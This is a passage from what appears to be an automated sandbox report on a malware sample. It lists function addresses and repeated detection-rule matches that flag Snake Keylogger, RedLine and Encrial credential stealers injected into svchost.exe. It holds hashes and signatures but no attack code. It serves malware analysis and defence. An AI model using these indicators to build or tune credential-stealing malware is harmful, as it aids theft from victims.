              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040DC116_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00407C3F6_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00418CCC6_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00406CA06_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004028B06_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041A4BE6_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004182446_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004016506_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402F206_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004193C46_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004187886_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402F896_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402B906_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004073A06_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036022606_2_03602260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036051E86_2_036051E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0360BE186_2_0360BE18
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0360358C6_2_0360358C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACD7BD6_2_07ACD7BD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACA5986_2_07ACA598
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACD4EA6_2_07ACD4EA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07AC74E06_2_07AC74E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACC4E06_2_07ACC4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACD2166_2_07ACD216
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACCF306_2_07ACCF30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07AC6EA86_2_07AC6EA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACEEE06_2_07ACEEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07AC2EF86_2_07AC2EF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACCC586_2_07ACCC58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACC9806_2_07ACC980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07AC586F6_2_07AC586F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACC6A86_2_07ACC6A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07AC43116_2_07AC4311
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACEED26_2_07ACEED2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACFBA86_2_07ACFBA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACFB986_2_07ACFB98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A95786_2_092A9578
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A25806_2_092A2580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AD9D86_2_092AD9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A50486_2_092A5048
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A9C486_2_092A9C48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A0B306_2_092A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A17B06_2_092A17B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A1E986_2_092A1E98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AD1286_2_092AD128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AD1196_2_092AD119
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A25726_2_092A2572
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AD5706_2_092AD570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AD5806_2_092AD580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AD9C86_2_092AD9C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A50386_2_092A5038
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AF8326_2_092AF832
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A00066_2_092A0006
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A00406_2_092A0040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AF8406_2_092AF840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AFC886_2_092AFC88
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AFC986_2_092AFC98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092ACCC06_2_092ACCC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092ACCD06_2_092ACCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AEB296_2_092AEB29
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A0B206_2_092A0B20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AEB386_2_092AEB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A93586_2_092A9358
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A8BB16_2_092A8BB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AEF806_2_092AEF80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A179F6_2_092A179F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AEF906_2_092AEF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AF3E86_2_092AF3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A8BC06_2_092A8BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AF3D76_2_092AF3D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092ADE306_2_092ADE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092ADE1F6_2_092ADE1F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AE27A6_2_092AE27A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092A1E8A6_2_092A1E8A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AE2886_2_092AE288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AE6E06_2_092AE6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_092AE6D06_2_092AE6D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040D606 appears 48 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 88 times
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: String function: 00E7F9F2 appears 40 times
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: String function: 00E69CB3 appears 31 times
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: String function: 00E80A30 appears 46 times
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: String function: 00C0F9F2 appears 40 times
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: String function: 00BF9CB3 appears 31 times
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: String function: 00C10A30 appears 46 times
              Source: DSD876543456780000.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.chordates.exe.3a90000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.chordates.exe.13e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
